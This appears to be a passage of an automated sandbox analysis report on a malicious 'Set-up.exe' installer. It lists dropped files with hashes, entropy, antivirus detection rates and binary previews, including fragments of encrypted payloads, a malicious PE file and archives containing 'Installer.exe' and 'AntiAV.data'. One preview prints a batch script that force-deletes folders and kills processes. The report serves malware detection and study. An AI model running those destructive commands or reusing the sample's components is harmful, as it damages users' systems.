                                                          Preview:...h..T..]..W...A..U..N.[K..]..xT.......e....J%a".P...n.FC.#.'...uf.8.h...c..l.........L:3....}...E......7%`.].....u..]8+.'<..^.<..B..@.~.:.t....S...=S.J...S..Z.....H%.05l<.......91!,.......D..z.!R.t.J".(........4*..hh.Z.`.6[;."+}}74..i./9+.xS..k.9..f..^x....J...../..Tp.#...K....;...:.:7e....[<q..xFNLyx..E}g.`..Xfv.[..._.!...].[u0b{..e3..F.N.gV..`..U..T.~..b..W0\..O*..|C._..O./6........:..1..!.'...]..&.t. }.I[\E.l.b...=..a...>..c%..6....T.>.......1...k8......M.L..e~..j.%9..'.t..2.%..k...e.Wg.j..h.....%X........G]d.S...UG......0......[....%.c..J....v..%Z=;L.1.mw.t..?..OlQO9[.....}.1......}...SU .e...fg.X.v..L...4..].g..-c&/.K....R|........]......;..G..RY.J...?.M...VI...1..r..w.)H..car...g...Q.3G..l{..m`.s....c......u....m...?.N.4.e. ..+..u...%..&)Z..........|...QR.2.,g&.......1.%.5.#.\x...N.1/;!..~...Z.....sy....H.M............"o........z. .Ke.~..l.K...+T....4;1..K...."........{....'.q...&./.u.v..D..5.U%.....r..............(2Ja.%..L2....H..
                                                          Process:C:\Users\user\Desktop\Set-up.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):88064
                                                          Entropy (8bit):7.998024184617885
                                                          Encrypted:true
                                                          SSDEEP:1536:RhaqCLBFpeRyoT+Q8r5M1KdAzIDX+NcW8nMiJtjaz30IDp9kkoi7:R03L8yoTR8rS1CAz6W8MiJtu30Ud
                                                          MD5:9E3F6562BE5559589F8D63C49D6403D7
                                                          SHA1:C01F888923FB7B64F7C2D1882840CB56D8FFA400
                                                          SHA-256:B8095DECD6493C0D875D41E44672AAC66584313754E76635EA5326CB79F5D32F
                                                          SHA-512:001DE81B2737CE8283DA0651EAE69A12FCE2F9E470080450F42BC886582F8065F10768626888CCD478886CC975E3743C6321904D01F96899CDC675366DF5EE22
                                                          Malicious:true
                                                          Preview:.\xN.!.$#.6U....N...2=O]<..e`..s7...,o...cb....hv....%oy....O..f..n.g$Tp.4)K..5........yASF...f,...=DF........6.x=..{E.k...l.......T..r..:.z.}...n...;.u.^@3j.J|."..J"w1..qM.l].......\cX...c`...y..1..C.8r.v.Z.b..F1}...@3.j.-.T..3.VQ...X.u.#5`&.!...'.`.......Z.....`j.&.F..Q@Z.V.u^og...>.B|../.e.t|..y......D..Q....gSt..a,....&..j+../...QN.>...t..K].8.]..<...~h.\..........QU...Fu...Q.....x..AS..!>...).]...x.NC.t.<..u..G..+...:",.Q..Wav*.t7.........$ ..$o[sV....1$.e...F.Ak.a&.F.V.<..&=E.>..I......a"..r1B].W.'!}...2......K...~...."....Z.7...i..Q<o......if.a7V......q|./.km..[.....^.....(.d.m..k7.{..............<...NZ6Y...Of.K.Z..UN.kf.~."7-.L~....+....w..K..;...=!Fc.!....o.d...Z..(.)'.........k,...!.y*.............@.WB.`...o.s.i...Q.'.E...^..H)O]|.D.{=..fF........o..|. ..q.7..y./....2.9.M..l.....KROGsU. ].....=4..}.......1t.Ka.g.}ey.......W....)d...C~W.:..).ex..}^..8..9.A+..F.6...|..[..]..w..r..HHwf.J1...j....aI]........D..>..)..
                                                          Process:C:\Users\user\Desktop\Set-up.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):94208
                                                          Entropy (8bit):7.997883858377553
                                                          Encrypted:true
                                                          SSDEEP:1536:TyD/eIdXgZ5vMGMopB/48uRN7YibuOSJ/bbkqe3CRIrjkRAuDWpwnWovP:O//wLvMGdpBrAJYib8J/bH5IHkxyploH
                                                          MD5:9FB1EE0C888305AE9D740F3ED746771C
                                                          SHA1:6416256E49C1F2B788957BEC98C79FEF6274B31E
                                                          SHA-256:D6A731422BD0B613671FFDCC5E103BDFE1BE2E72DCDC364B4A1FC5A35FEE29DD
                                                          SHA-512:89A6DB9B8A019B2992878075ACAAE773F266F9E5B63C5D55DB14219F5C5A568B765AB47BE246AE1088CA1AA6CB8204C4DE3FA9F6DAF763114832FC853B8B2F65
                                                          Malicious:true
                                                          Preview:$.*...../?:.........oa.q+.}.&m..S'F...9B..H0.....c....<|.a.)'.i.. .X.!....O....Q...N2x3S4...w..}...V....,...8.H..HnJ....p..%..mY..521..=..0....N....;.............y+..}..|/..L..E.=..`....,.Nn.1.1.......I/..@..t2E(....d..|p.._.C...H..f.w.$..Xy......'e.1m:\..!........;.e.....D....z...3wj+.Of....w.....YM..z;:......}.A.E.;{74[81.G`....I..Ld;.~N.$A.....O.<{j.....i.f.=.....B.P...BB...L...B..!..n..............-...-...iQ..q...Q...RKy7...mS...W...8..3y............5.>z....M.fyc..j.>.....p...J"...K.......I...@Mm"....n....W<.g..W..6a/..G.i.Ub.8.dq....T........Vr.Yv`...%....Iu.J..w.s. s../...)9.....T..b....A)B(.:>84)7.7..!....6.@R..B.,,D.o.V..Q..jwS...........I4%.1.(2#mG.9.Q.......Q.........5...Y..........C..L.V.N.....A..C...Q| .$.Z.....b...T<..O.*.-e....Za;3..$.....:8......6...y._..........C.cd/..O.\.G........?-.m..a3.P..X.[....o.>c....W...J..v.....l)...\...$....x..q~M....n.....~}.;...=b..C...i...-}.t.q............\..(a...[..4X.A.;.(U..5N.<.b..>.
                                                          Process:C:\Users\user\Desktop\Set-up.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):60416
                                                          Entropy (8bit):7.997394872132741
                                                          Encrypted:true
                                                          SSDEEP:1536:u/1ObcLdRr2C9TXig7D4Bi7AUqeZZAQ+dTNVx:Eg4JRrx9jbPAwZudNVx
                                                          MD5:A6D44CDC07946516629C0B7F559ABDAF
                                                          SHA1:0B54E19C837582B82F7F68B28ACD42BE089D3B8A
                                                          SHA-256:1D521C9D684C89F09D15494602FD98A3BD58056226EC4EB5092B7051D2DBF019
                                                          SHA-512:9CCD0258BAE82BCCDAD4D6C5B04A42B835C6E65B363855115352474E33668B818F741A931D03ED54FB427D81EED7E676427253ACF807F1B36184B219B2EDE823
                                                          Malicious:true
                                                          Preview:tc....).N~=..KD...I...=...YZ.G..g.7E.. .c..g..]...gJ...5...y...c'...#>.KG".....v..]/r.._h..w................O..Y........a\..^&E5Rp#.*D..V.Rlbs..2|.......gO.......}..;.j..wH4.i.H+.M...R.(.`;Wv..vv.!.A....Y..y.o.y._.M.v%c^..Bx...w..'.hO..7..[cy...^.(.L.B.fo.,.G*.....m...i}k...b.z.+.N.t+A..!..Br1b.....M..l.:.H.&...v..;c..(..]:...E.q...........Z2V....W.%....dN..@.>..&..H.........c..l.......P.L .7...K.`......Ie.d.%...............b..n...y...X.*.i...c.....h... .nHHbM...k.P.....m...(...^P...U.x.....<''....c.\..#*.x.-.....T..r5..h......gD.y.G~{.N8%du..QI..-..FR...Gq....rd.....$..;..p.g...9..2.S..`.{..*l?...Q..N...\=..r.#y1.BI^{GV|hB.E.'..3..d.pRzS#...`#.;.r...;=..5....>...M....Xs......br.K...'...E<....!~...}.#..:.<nFd..,.;X\......#.t..g#..t.....G......B%[..F.......8.t..yM=g}.....\.wJ...o..X\[..0..u...4e....G3.cH.>..O...F ..p....s.H...].+-..$...U.y.%...N.t#LT..4.....(.u#.4?..L..3.+MR8...k....Sd..*...r.....'8.!.{.rI.(&..D..}j.C...(.KJ\D...2T.KFJ
                                                          Process:C:\Users\user\Desktop\Set-up.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):67584
                                                          Entropy (8bit):7.996992641245611
                                                          Encrypted:true
                                                          SSDEEP:1536:iyXiMONTU0VIIBKcjvkS25GiHT1HMHOBOUzYculvW1gdS:iKiM8huIBljcb00pskaYgdS
                                                          MD5:607C95C6A1150323A0027B7C5950C96B
                                                          SHA1:DCEFC4D843F40AD9874E33FAE0DB7F73A9A5E54A
                                                          SHA-256:D4EDC7E93CAB9CAC32D656EAEA7505C38C31BE52EB8C9255B346407FE695DBE9
                                                          SHA-512:6C99CE6F81147243D964DD09DC3917B0160898B4DA2A4E9A629319C284DFD6312337CC1E9C6897329E51C33B139380FF6EE3EB4F5D98DEB192D0608C44274D23
                                                          Malicious:true
                                                          Preview:,t.I..6.....'U?..o....Mc.s....g.'..9:..^....L.Sd...d.S......([....m.D..P.e....S..:.3..?...X...e.....e..3W.../..\>.a.c..qP6<....S3..8^..).O...+.@.A.E...................l]O..N.F..[..,?NO..od.f..-..K........JD...~.FR..Lk.{tq.......8..6xh..j..L....b..H$kX....O......z.e.(n.66...iA.~R..V.....l.A....o...V./'.ppz..X.\..0..B.{.B.x..UD.....N-..G(nmF8Y...R...QQ.w..V.1e.....wi..dM.m....D..?5..p._Z..9.Z.u.G.'.._.|0$z....er7..*Y.....f...Ak.c.#o.......E.\|....[..J<..cxE,..hl.NG..)...[..O..'..o]#.\sY..6$.V...H.........K.....8(..2..8O...o..\........;y@.pK.l$59D..<f;L.d......R9S...7e..j....`..2F...7...u...9,...Lx..8Y.....@\......E.....\..2.w..Ux]....4.gU.J......*(........?.......P.....n..]H.t!`B"..6}....d.R.p...T9YNL$.;.q..\n........-...zU...}.i...[.B)5..x.....\AJ."+.....GO3....}._....8....!..........@....IEc..|j..#..0.....K..;='.=\Q......z...y.X.f...Z.-..q..@..W...w...Y:$.R......b5.L/4$?....o...H7.r..(.&..V.......x3...i9.e..<...j.....?
                                                          Process:C:\Users\user\Desktop\Set-up.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):79872
                                                          Entropy (8bit):7.997699958942892
                                                          Encrypted:true
                                                          SSDEEP:1536:dFjEs/H+AFByfVErHUC2VhyP7SMSfI2+A3sfZ170/RjnFisaDP6:njVf+Cc6rHUZzyPBR2b6Z1wRsW
                                                          MD5:A1422490FFA8E715033C4F777BE4603F
                                                          SHA1:7DA0EFBABA9ACF1EA60644932C0E3430E4B9A39C
                                                          SHA-256:A422FE491F329D779DE8B717ED219BF543DD5C489E4A2CEABDD21160BD359394
                                                          SHA-512:A5FD7387DD1B8F363EEAAD8EE92D464036534664471FB7A40ACCBB177AD5E3EC8C2E9DC048D5F0FBCB00F97DABF7D49242EFEC18E1575D2BC2582D8036B957CD
                                                          Malicious:true
                                                          Preview:v.aj...:6x.L..o}........)...'.M.[....a5..z15..Zq..K.....v..hn.=..%.N.....%...y.@9Ko.k....F....|R)~(....[....$.&...$....p>..M..4V.].,..uz.......c1.\r.tM.. .....ma.>?...W...;.i....\#J.............1.........K=......fH.1.. y...rj-..e..n.q.1............fM'..p.L.3..B...9V.R....M....G4.kD.HK9...&b...p...\....Vz..&]..2|u....P.,...J.n.Ot.....-fg.......!K_.P.Fe.LgP...4.e.D.N"...62..!1{...)...l|k.>..V..&....{..V.....[~C...aw...T.Y@KPB..I.5.....+W.s.o.%....0.tY.O8......(.}f..)<@.e...X.I..........0%7.A.W/*..^..w...0....?.)...dJU?k.r.z..)M$S.....M.T.,;......lFo..A.PU-....f.b|.2..j..O....F..yRn.h.w..IrH.k4...l~............e7.i.21L.N.XW..g6.Q.. .#.]<..2I..h].T.H{ 9Z..............l.q...........N#....U...Z..g....z...;q......N.w.....@.z]5.o....E.?aq.;...:'.,......|{......aJ..i....d%.......7=".V.i[gNT"u..\...,..Re........w1...@.YS..v..eN..gc....W...].D....^.O.'...1.].h4O.u..<x...B..c.al.../.>H.?y..u...>.....!.o*.;...c..&c.......D.m..V'.....k..Ty....."_j..s@z...
                                                          Process:C:\Users\user\AppData\Local\Temp\506033\Limitations.pif
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3125704
                                                          Entropy (8bit):7.990259949871784
                                                          Encrypted:true
                                                          SSDEEP:49152:MN5JrWK2CToOR1ewbLQZ5reodSTgYSFLDJzIAMAAAedMnMbw0gvbP/+3jxYQzbPI:MN5JrW2oo1ewbLQzegSTgNFLDRR4KMbw
                                                          MD5:CE901A874C9D157E48F83B1BE3D32AA6
                                                          SHA1:9BC12D5DB437C0673437E9FEAADD0027887D1C13
                                                          SHA-256:35401B151F704F6BBBF4F8B36D886E4DC391809822181B396C02D243C0ACA7F0
                                                          SHA-512:EA6511B4E318EB31E4DD8862CD7967906BD1705F2B1D6422B28424F0C810F9647702315B9BDCEA1FD32421E5D72B61027E9991DA6B779D6DE02B61E410EEB747
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 79%
                                                          Joe Sandbox View:
                                                          • Filename: inject.exe, Detection: malicious, Browse
                                                          Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L....?.O............................_.............@.................................X.0..............................................0...N...........u/..<..............................................................l............................text............................... ..`.rdata...;.......<..................@..@.data....M..........................@....rsrc....N...0...P..................@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P.P...P....Y.nj'.@....u..v..=..A..6P......P....9^..].v8.^..3......h..A.P..........P......P..x.A..E..E....;F.r......P.~...Y..6..j...t.A...t$..D....V...%s......A..F8......^.j..q.....A..3.9.`.A.t...@....9D$.t..t$.Ph.....5X.A.....A.3.....D$..`...|$..u..@.....3.....p.A.............t$..D$..t$...`.A./.@..t$...P.Q..%`.A...3.....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u...t$...T.A..L$.......%..........S.\$.V..C;^.tLW3.j.Z...........Q.....3.9F.Y~.9F
                                                          Process:C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1679360
                                                          Entropy (8bit):6.278252955513617
                                                          Encrypted:false
                                                          SSDEEP:24576:S+clx4tCQJSVAFja8i/RwQQmzgO67V3bYgR+zypEqxr2VSlLP:jclmJSVARa86xzW3xRoyqqxrT
                                                          MD5:72491C7B87A7C2DD350B727444F13BB4
                                                          SHA1:1E9338D56DB7DED386878EAB7BB44B8934AB1BC7
                                                          SHA-256:34AD9BB80FE8BF28171E671228EB5B64A55CAA388C31CB8C0DF77C0136735891
                                                          SHA-512:583D0859D29145DFC48287C5A1B459E5DB4E939624BD549FF02C61EAE8A0F31FC96A509F3E146200CDD4C93B154123E5ADFBFE01F7D172DB33968155189B5511
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w...$...$...$.&.$...$.&.$...$...$...$.&.$%..$.&.$..$.&G$...$.&.$...$.&.$...$.&.$...$Rich...$........................PE..d.....n\.........." .........H...............................................P............`.............................................y...l...x........{...p.......................................................................................................text............................... ..`.rdata..9...........................@..@.data...............................@....pdata.......p... ..................@..@.rsrc....{.......|..................@..@.reloc...0.......2...n..............@..B........................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exe
                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):468992
                                                          Entropy (8bit):6.157743912672224
                                                          Encrypted:false
                                                          SSDEEP:6144:fz1gL5pRTMTTjMkId/BynSx7dEe6XwzRaktNP08NhKs39zo43fTtl1fayCV7+DHV:r1gL5pRTcAkS/3hzN8qE43fm78V
                                                          MD5:619F7135621B50FD1900FF24AADE1524
                                                          SHA1:6C7EA8BBD435163AE3945CBEF30EF6B9872A4591
                                                          SHA-256:344F076BB1211CB02ECA9E5ED2C0CE59BCF74CCBC749EC611538FA14ECB9AAD2
                                                          SHA-512:2C7293C084D09BC2E3AE2D066DD7B331C810D9E2EECA8B236A8E87FDEB18E877B948747D3491FCAFF245816507685250BD35F984C67A43B29B0AE31ECB2BD628
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........(...{...{...{...{...{...{...{...{...{...{...{...{...{..!{...{...{...{...{...{Rich...{................PE..d.....n\.........."..........l...... .........@...........................................`.....................................................x....`..........,a...........p.......................................................... ............................text............................... ..`.rdata..............................@..@.data....,..........................@....pdata..,a.......b..................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\X0JA3EDV7BU5B3IH21ST0OE852AR.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):222
                                                          Entropy (8bit):4.855194602218789
                                                          Encrypted:false
                                                          SSDEEP:6:vFuj9HUHOPLtInnIgvRY77flFjfA+qpxuArS3+xTfVk3:duj9HeONgvRYnlfYFrSMTtk3
                                                          MD5:68CECDF24AA2FD011ECE466F00EF8450
                                                          SHA1:2F859046187E0D5286D0566FAC590B1836F6E1B7
                                                          SHA-256:64929489DC8A0D66EA95113D4E676368EDB576EA85D23564D53346B21C202770
                                                          SHA-512:471305140CF67ABAEC6927058853EF43C97BDCA763398263FB7932550D72D69B2A9668B286DF80B6B28E9DD1CBA1C44AAA436931F42CC57766EFF280FDB5477C
                                                          Malicious:false
                                                          Preview:Cd /d %1..Rd "%SfxVarApiPath%"..For /f "Tokens=1,2 Delims=," %%I In ('TaskList /fo CSV /nh') Do (.. If %%I==%2 (.. Set /a N+=1.. Set PID=%%~J.. )..)..If %N% EQU 1 Rd /s /q %1..If %N% GTR 1 TaskKill /pid %PID% /t /f
                                                          Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):2343406
                                                          Entropy (8bit):5.89551469554261
                                                          Encrypted:false
                                                          SSDEEP:24576:5yZBPkpRrP9pxC+XvoflcYy36s3vb0EecYy37n92k8GtGAQZ67hR7krC/Cyf0/xR:R9kqGu7okoZscCnf0/Zs9k
                                                          MD5:AEFFE98F08187C1796B0C19E28AFF08F
                                                          SHA1:418740DFB8FA1EA685F78D7641586FCA0417BF8F
                                                          SHA-256:6659A9416A334434BDE5035F119D84E7FFDC74C0B1364650E0A323AFB191FD87
                                                          SHA-512:29F085F81CEF17F233103AC553199EED25C81E89CB8EB9DF4F24B32C68763DCF7498B50ABA10252496B2F19587B57885365019AE694BBE5BD6EACAD8E25AF370
                                                          Malicious:false
                                                          Preview:KmO6sb9bzFlO6QmlyBR3cUuBrPdmJRJBhXshklfui2fRJCiITlYNEM2EqC9x9I0qVq7CGnIhkwh6hvGvu5pkfBRaoLATG90WNTmCTDFIBTSnd7l9KiCxIUJ5zlBvrKkHZaxyJb0N052Q1AaMDCASX2cw1ZaV1bKcufYPprTSqVIRscgIruKC2MOUPLxNBR1egyVxwSbedVhVl89lRxHAMRMf16G6Ry1TTz7dOtnEaLQowPwuw8eDnR20ZOyf9yYTVcpDsiS4K2VzryfyiwiOXZDq7UaTFrtOgtVQzuNXN74O8xkfvt4Ykzxcs60WfAkGZKsYbwZWS4bPPY8cze1vDL6leHmcDUIbsBvTleZtzGhgeYGdRaUmv5ljenoBZOBDIndh9KTa7zBVHuP4jAK8C2IKaB5BgFReYTleqD0cCkhTdxbkQAMwHPuKktcCRORGmFfE37OzhnpNUtRyIHoGBwau6RcKp6vTNwIWRMkDjZaejD2NS5TCgRvcwgZcldKIAtOqIN0TXMXlnX6scNgHltMTvvwSZbBsDdCGRINZlutVfbP6joQl5sw21ICykYYYKwRfLlfpREpOzuAjwo7oC8hJ4Tv652auJh1RujdaLcIfX5oB1GDuu95ojl52qB08Lzg7nIl7yDb4k9X8rUPZ857XTGTaXkhL77wwG75hAnvfazjbPfP5GZrDYRdhe2I0zSJZuV5aaWd5Imf8Ck0w9ALkKR7xhRlclC4FnJOBuXxpdcsG9gE8tgukaoXpzf4z0CHJ0VOfBNcErBEPyoWMZfee3Vfg2NyLVPvaC6c5HNC1mZSr0SpB1RAlj2w7ST9eZL5DUYwl8p6flt6I3p7MBJrZLlY3LgBSr5F4BYYU6sebHdx0ES2Ci6J9wBw0wGLCy8SeSDS45pkrvWvTZkvW2oFTNBda3aYJyut0zJi1Chjp4xQkH1cEMWZUOy7MueiWNcfeKZqM4Gg2hr7XoLoTQXyvcXvxeOwXoXJKXvu4
                                                          Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):625464
                                                          Entropy (8bit):7.5510269559180125
                                                          Encrypted:false
                                                          SSDEEP:12288:dAcRtQRBRwAI/GE+g19EggvGkKj0cRgzAI/GE+g19EggvGkKj0cRgJ:rjybIeXuugoKocKUIeXuugoKocKJ
                                                          MD5:89A069871324D35E25922F6FB881D514
                                                          SHA1:985F31CD2E5B7B6C5AB6FF41CE33837987A06171
                                                          SHA-256:7FAF92E0275F06214930A5EBBE11F1E98781CCD7CF4B95A0C23E5FCB013AD1AB
                                                          SHA-512:9D8E49DE5D5947E8CC682CC70D81191B380260233F26EAB25BEB1398F745EF47EA297A4AAD6D0B30F87AC65EC5B90B5E4516AFABF57CCB519BC4FF6A002D1566
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 92%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......//.kN..kN..kN...%..aN...%...N...%..yN..9;..zN..9;..zN..9;..CN...%..bN..kN..0N..=;..jN..=;y.jN..kN..jN..=;..jN..RichkN..........................PE..L....v:a.................&...X)..............@....@...........................*.....^B....@.....................................d.....).................8.....*........8...............................@............@..H............................text...)%.......&.................. ..`.rdata...x...@...z...*..............@..@.data.....'.........................@....rsrc.........).....................@..@.reloc........*.....................@..B........................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                          Category:dropped
                                                          Size (bytes):511531
                                                          Entropy (8bit):7.998133089879453
                                                          Encrypted:true
                                                          SSDEEP:12288:J3Fvr/KrgOD4W/iTJxnZxZt84otoKPF7rcFC7L7:lFmr9DV6TJpZxXEL9rNX7
                                                          MD5:392805D581FCA99EDCB5F947E3EBB2CC
                                                          SHA1:49506423DE1FE1A89C50BF492E57998A590B9EE6
                                                          SHA-256:4A4CD834312421431D41AA5A988FC2FBBCA4165961F9B023CFC2B21EFAD858ED
                                                          SHA-512:7D191C9D592739BA54AD6D0BEEA26790B5020CEFAD5AD778FDB5695C13E848E7EFBFE43A1C9DA098DB1AE5E3BC758924746A3CAC2CE5C8AAE1371EBBBF50746A
                                                          Malicious:true
                                                          Preview:PK........Kn.Y..5....8.......Installer.exe.\}`.....K.pa...1.)A...4........)..&..i<.R......9.f8.....R.....?J/.&.*........5J...l.o..H.....|.y.f.....Zr...!I...iJ.^...H...c..I...$=9....V.|.........Ol.....o..U.m....w..]~c...w.[.UzzZv...W..6.....in.W..X.."..W. .....{E.M.......~u.h..k......UD.......S.U.....:.._.)....6..V....^.n.h.4K...^s.(.=.&.&.F...KR..=.K.+...,u.:..@.v,....=6i.%v\...e;W.]....>z....M.mR.Y...l...t...5.U......sm. 1Vy<.W.n.j.[.[.........8..WY`.H.2.....<.!..U.6o..i.U.YJC..........9.. ~...pK....O.u._.J.4)...S<..Ai.-.......J&;.Q.9...J].u....Q...a..$..".?.4#.....w.....d...TI...J.......g.....t.i....S..m.H...1...E.J..+b.Rl,z....G)L?..... ..*.,..T..O.....@...5.......$....j,+.`.+b.oc;...X..,"U...&.6.f...J......].2.+...)...R...B.=....L.u........l....S.=..:....6..@t;.r...w..d..(bA..fAJ....q...u.....0:.......'...1...=A)...s6S.y.q<.[..N!.c.J.....f$.......@3..%Ic."f..X.u..<n9.v..=....a.`.n.e......u......d.....i^....XT.7._=9d.as....O3PdW.;%..,.V.
                                                          Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                          Category:dropped
                                                          Size (bytes):512845
                                                          Entropy (8bit):7.998150131603083
                                                          Encrypted:true
                                                          SSDEEP:12288:B/3FvrlOjguZKmxM1J/NPT5R82orQYR7truFC/Hd:BvFojtZ/u1JlPTLexxrD/d
                                                          MD5:0067A8449FAD7927F7CCD78AD32DDC6C
                                                          SHA1:53BF7574BF168C644D40E2404F2346528FB16F18
                                                          SHA-256:CFAEEED5348C9AC2D172D31FD2CDFFB253D6BCBE44FC325D490BC368F5229989
                                                          SHA-512:6D6D9734833DE212E92C242E08EEEE4BB6D8CEAC2EE6F2AC0BAFA30573E0EFBC8A1EF0DE071B71950D9AB3A524580BC9EEC9EB420E6AFA8A2711EF248372AF14
                                                          Malicious:true
                                                          Preview:PK........Rn.Y.I............file_9.zipd.Sl-l....;..S..]....m.v...m.;Hf2......|w.b-%Yp.8..>.;.m...Z.yh.....o3............9h...?......f..,4.?....o...._.\..I..&...?...a.&.!y[gggR.......R....7...}.......9g...i.;....E.._...;.S../.....!..-.l..g-.G...e....z'{.....X..5?......O..u...G....?.@..*0d..&l.FBVX.;2(P.#...$.......F..V..#.....VZ...p.....JNL...7~.d.Q&..../...+2..].a9..Oe........W..z ....lrh'G.+..$Y..........)|......W.W.{..O...I.F.=....{$....m...F|.<.......6n._.......U.z.H<l.*..6.<...S.V.......?'_........Dpw..@.....].L....j.....|J..........u....w.l.....,_.............e-)..I.y.....VK...-\z.b..:O..b.E.=]..c.....|.k.6`xo.[.'.B.7Z.$..B2L"....k....acN.........W.k..W......5.....f..~...<>............*T.h.u...](p..v..i...../d.....6.;.0.. ..l1....-KkJK..n..3.id..it...'...b...m....H.....]...1..%.bKO9...-..&D].[.O;....]....Bro..m...?,..(.`.....m.D..m.....v..ue......+...9yN.Cy=.U.|.V.....sl|.S..Go. .H.=.!?..V....),..w....wG...Q9.L.5...0..
                                                          Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                          Category:dropped
                                                          Size (bytes):2180530
                                                          Entropy (8bit):7.99835792425981
                                                          Encrypted:true
                                                          SSDEEP:49152:fujCK3D0AC/l5mwbBkDWYb1ZN4UJ9oc0/uNUrT1:faR3D0Ae5mwdkDWm1Xoe4T1
                                                          MD5:7632984F9B26DBB8923DA2348366665B
                                                          SHA1:C99703AD6DB21039BA169A60C106A08B2BCDB139
                                                          SHA-256:69B1C0618D5418CE0E37171191F4AE23986B56779116ED29C3417089654FA897
                                                          SHA-512:543750B4FD6BC31884296D8CF0BF8DAF56A90ED4223BD7B7650DC2B668DA4965718F1511459A2900AB8D975923256918415076A2F7E0FF2FAA454522097B1E95
                                                          Malicious:true
                                                          Preview:PK........Rn.Y.F._Cq....#.....AntiAV.data..E..@.D..C/qwg..;...mG.3H..|...$..}.`..8......lV1*..4...Cu.H.(l+{Cl.:........$+Nr....\.u.K_1N:k.'....F...... .....+.70..R.>..A..#6L.:..n..7......Y..y......v.,....=...e....fe.4.@...h..+....=.#...T....*..A..|...{A.p{.b*.|.[...Q...z.v.....iD.....W.....;...........YVL._._.F..4./g;syC.....e,.N..>t.43..p.T4?.K.....:Z.XDVS.gj.)cp..A9.7^.d.M.d.j..c:.(T<J._3-..8.,."s.'...B\.q...\..e.!..{l.\.]'.P.2}..l@^.G...{n..p..u.n.1;W..#..p.A.YD7.....,.o..z;.6T../.w..=.3K5..]............U...,r....n....(..I.....Q.o%.NF..Q.h$y.".7.tU..eVe.b.q.S4%"C..$g..iX..XQl..?Z.U.|.g....&.d..Y.|..5O...s.|..A..@.Y1F.o.o.s.'UY.AU#....D.K.....A....=t.M..L4...{.....BF.Rg.-...j..p.c..'.2....].m..w37t...Rn.r....v....W..g0E......)-.6.=v/.9...o..~.mh.U.&...5.ld4k.gG.G.S.w4G..]'.5......r..Q.U.U.9.Vv....2.>....p.s.p..e....(..}Jox.....Z..[Y..ku.....5....s.././....:...v......h.u.ZlG.>).,.(....Ye<.....3...:T:)...-).=.L.=.2F....&H7..j..\.B6.Ox.\....
                                                          Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                          File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                          Category:dropped
                                                          Size (bytes):511685
                                                          Entropy (8bit):7.998145921569035
                                                          Encrypted:true
                                                          SSDEEP:12288:u3Fvr/KrgOD4W/iTJxnZxZt84otoKPF7rcFC7L7:YFmr9DV6TJpZxXEL9rNX7
                                                          MD5:BD4D86CA5CBAE5438024F64045DB97F6
                                                          SHA1:67BA58848842592A9E2F8DD2D1ED97FD3E7D38CB
                                                          SHA-256:C64F47CE2527018D5D52CCFEA53103762A1D91146D09938237215AF6968DFAB3
                                                          SHA-512:4B5DCE84CDF649CDDFA499A6F875FB00676051E650178A0A742EEA62B91CFF0055CF6B5D2C1517AC500398D531A6F4A02131ED9CCD135B3C4A5BA18D4E2DDCE7
                                                          Malicious:true
